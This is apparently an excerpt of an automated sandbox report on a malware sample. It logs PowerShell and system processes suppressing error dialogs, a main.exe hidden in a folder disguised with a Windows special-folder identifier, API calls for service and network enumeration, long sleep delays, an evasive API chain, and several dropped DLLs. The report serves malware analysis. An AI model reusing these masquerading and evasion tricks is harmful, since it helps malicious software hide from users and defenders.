Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,		20_2_00007FFE0EB434F4
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,		31_2_00007FFE116E34F4

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE0E162BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE0EB45728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE0EBD2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE0EC02CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE11502278
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	20_2_00007FFE13301D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	31_2_00007FFE116B2BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	31_2_00007FFE116E5728
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	31_2_00007FFE11712BA8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	31_2_00007FFE11742CE8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	31_2_00007FFE11772278

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5789	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4067	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8826	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 697	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7894	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1724	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\ieIgHN2A	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\wwgq2y6S	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\9m9shiPj	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\TzijR9kt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\ia0qD2w9	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\I2Hoxnam	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\NCdDxWNe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\oWkqS6Ji	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\6DPA479I	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_20-62209

